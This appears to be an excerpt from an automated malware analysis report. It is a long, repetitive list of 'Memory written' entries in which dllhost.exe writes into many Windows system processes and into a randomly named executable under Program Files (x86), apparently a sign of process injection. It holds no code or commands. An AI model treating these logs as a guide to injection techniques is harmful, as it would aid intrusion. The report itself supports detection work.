Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23023330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
